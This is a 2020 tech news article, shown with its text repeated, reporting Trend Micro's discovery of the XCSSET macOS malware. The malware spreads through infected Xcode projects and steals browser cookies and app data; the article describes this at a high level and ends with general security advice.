Developers
September 17, 2020

Dangerous New Mac Malware Uses Xcode to Spread

Trend Micro has discovered a dangerous new Mac malware that could lead to supply chain attacks.

Apple’s Mac platform has traditionally been more secure than Windows, thanks to a combination of factors. One of those factors is that macOS is based on UNIX, an inherently secure operating system. Another factor has been “security through obscurity.” In other words, because the macOS market share was relatively small, it wasn’t worth it for hackers to target the platform.

In recent years, the status quo has begun to change. There has been a significant rise in the number and type of malware targeting macOS, thanks largely to its growing market share. One of the most dangerous, however, is one that Trend Micro recently discovered. This new malware injects itself into Xcode projects and could result in major supply chain attacks.

The Danger of Supply Chain Attacks

A supply chain attack is one where hackers are able to inject code into a project or codebase. As a result, anyone downstream of the attack can be impacted.

In the world of hacking, where an effort is made to maximize the return on investment, a supply chain attack is a holy grail. A single well-executed attack can have far-reaching implications.

When it comes to supply chain attacks, few are as dangerous as one that impacts the very tools used to create software. Successfully pull off this kind of attack, and every piece of software created with that development tool could be compromised. This kind of attack would cross-industries, platforms, types of software, and more.

Unfortunately for Mac developers, Trend Micro discovered a type of malware that does just that.

Trend Micro’s Findings

Trend Micro’s investigation uncovered some disturbing details regarding this particular malware, dubbed XCSSET:

”We have discovered an unusual infection related to Xcode developer projects. Upon further investigation, we discovered that a developer’s Xcode project at large contained the source malware, which leads to a rabbit hole of malicious payloads. Most notable in our investigation is the discovery of two zero-day exploits: one is used to steal cookies via a flaw in the behavior of Data Vaults, another is used to abuse the development version of Safari.

”This scenario is quite unusual; in this case, malicious code is injected into local Xcode projects so that when the project is built, the malicious code is run. This poses a risk for Xcode developers in particular. The threat escalates since we have identified affected developers who shared their projects on GitHub, leading to a supply-chain-like attack for users who rely on these repositories as dependencies in their own projects. We have also identified this threat in sources such as VirusTotal, which indicates this threat is at large.”

Rather than being a proof-of-concept malware, XCSSET actively steals data:

”This threat primarily spreads via Xcode projects and maliciously modified applications created from the malware. It is not yet clear how the threat initially enters these systems. Presumably, these systems would be primarily used by developers. These Xcode projects have been modified such that upon building, these projects would run malicious code. This eventually leads to the main XCSSET malware being dropped and run on the affected system. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.”

In addition, Trend Micro detailed the various applications XCSSET can steal data from:

”Once present on an affected system, XCSSET is capable of the following behavior:

•      Using exploits, it abuses the existing the Safari and other installed browsers to steal user data. In particular, it

•      Uses a vulnerability to read and dump Safari cookies

•      Uses the Safari development version to inject JavaScript backdoors onto websites via a Universal Cross-site Scripting (UXSS) attack

•      It steals information from the user’s Evernote, Notes, Skype, Telegram, QQ , and WeChat apps

•      It takes screenshots of the user’s current screen

•      It uploads files from the affected machines to the attacker’s specified server

•      It encrypts files and shows a ransom note if commanded by the server

”The method of distribution used can only be described as clever. Affected developers will unwittingly distribute the malicious trojan to their users in the form of the compromised Xcode projects, and methods to verify the distributed file (such as checking hashes) would not help as the developers would be unaware that they are distributing malicious files.”

How to Avoid XCSSET

Given how recently this malware was discovered, it may take some time to determine its full impact, and how many systems it has compromised.

In the meantime, Trend Micro recommends that Mac users only download software from trusted marketplaces. For developers who download and use third-party resources and libraries, it’s important to invest in a good, multi-layered security solution.

Many Mac users have long prided themselves on not needing the array of antivirus and anti-malware solutions Windows users have relied on for decades, despite experts warning of the growing risks. This latest finding makes it clear those days are gone for good. Every Mac user, and especially developers, should invest in a good security solution.

TagsXcodeSupply Chain AttacksMalwareSecurity
Matt Milano
Technical Writer
Matt is a tech journalist and writer with a background in web and software development.

Related Articles

Back
DevelopersSeptember 17, 2020
Dangerous New Mac Malware Uses Xcode to Spread
Trend Micro has discovered a dangerous new Mac malware that could lead to supply chain attacks.

Apple’s Mac platform has traditionally been more secure than Windows, thanks to a combination of factors. One of those factors is that macOS is based on UNIX, an inherently secure operating system. Another factor has been “security through obscurity.” In other words, because the macOS market share was relatively small, it wasn’t worth it for hackers to target the platform.

In recent years, the status quo has begun to change. There has been a significant rise in the number and type of malware targeting macOS, thanks largely to its growing market share. One of the most dangerous, however, is one that Trend Micro recently discovered. This new malware injects itself into Xcode projects and could result in major supply chain attacks.

The Danger of Supply Chain Attacks

A supply chain attack is one where hackers are able to inject code into a project or codebase. As a result, anyone downstream of the attack can be impacted.

In the world of hacking, where an effort is made to maximize the return on investment, a supply chain attack is a holy grail. A single well-executed attack can have far-reaching implications.

When it comes to supply chain attacks, few are as dangerous as one that impacts the very tools used to create software. Successfully pull off this kind of attack, and every piece of software created with that development tool could be compromised. This kind of attack would cross-industries, platforms, types of software, and more.

Unfortunately for Mac developers, Trend Micro discovered a type of malware that does just that.

Trend Micro’s Findings

Trend Micro’s investigation uncovered some disturbing details regarding this particular malware, dubbed XCSSET:

”We have discovered an unusual infection related to Xcode developer projects. Upon further investigation, we discovered that a developer’s Xcode project at large contained the source malware, which leads to a rabbit hole of malicious payloads. Most notable in our investigation is the discovery of two zero-day exploits: one is used to steal cookies via a flaw in the behavior of Data Vaults, another is used to abuse the development version of Safari.

”This scenario is quite unusual; in this case, malicious code is injected into local Xcode projects so that when the project is built, the malicious code is run. This poses a risk for Xcode developers in particular. The threat escalates since we have identified affected developers who shared their projects on GitHub, leading to a supply-chain-like attack for users who rely on these repositories as dependencies in their own projects. We have also identified this threat in sources such as VirusTotal, which indicates this threat is at large.”

Rather than being a proof-of-concept malware, XCSSET actively steals data:

”This threat primarily spreads via Xcode projects and maliciously modified applications created from the malware. It is not yet clear how the threat initially enters these systems. Presumably, these systems would be primarily used by developers. These Xcode projects have been modified such that upon building, these projects would run malicious code. This eventually leads to the main XCSSET malware being dropped and run on the affected system. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.”

In addition, Trend Micro detailed the various applications XCSSET can steal data from:

”Once present on an affected system, XCSSET is capable of the following behavior:

•      Using exploits, it abuses the existing the Safari and other installed browsers to steal user data. In particular, it

•      Uses a vulnerability to read and dump Safari cookies

•      Uses the Safari development version to inject JavaScript backdoors onto websites via a Universal Cross-site Scripting (UXSS) attack

•      It steals information from the user’s Evernote, Notes, Skype, Telegram, QQ , and WeChat apps

•      It takes screenshots of the user’s current screen

•      It uploads files from the affected machines to the attacker’s specified server

•      It encrypts files and shows a ransom note if commanded by the server

”The method of distribution used can only be described as clever. Affected developers will unwittingly distribute the malicious trojan to their users in the form of the compromised Xcode projects, and methods to verify the distributed file (such as checking hashes) would not help as the developers would be unaware that they are distributing malicious files.”

How to Avoid XCSSET

Given how recently this malware was discovered, it may take some time to determine its full impact, and how many systems it has compromised.

In the meantime, Trend Micro recommends that Mac users only download software from trusted marketplaces. For developers who download and use third-party resources and libraries, it’s important to invest in a good, multi-layered security solution.

Many Mac users have long prided themselves on not needing the array of antivirus and anti-malware solutions Windows users have relied on for decades, despite experts warning of the growing risks. This latest finding makes it clear those days are gone for good. Every Mac user, and especially developers, should invest in a good security solution.

Xcode
Supply Chain Attacks
Malware
Security
About the author
Matt Milano -Technical Writer
Matt is a tech journalist and writer with a background in web and software development.

Related Articles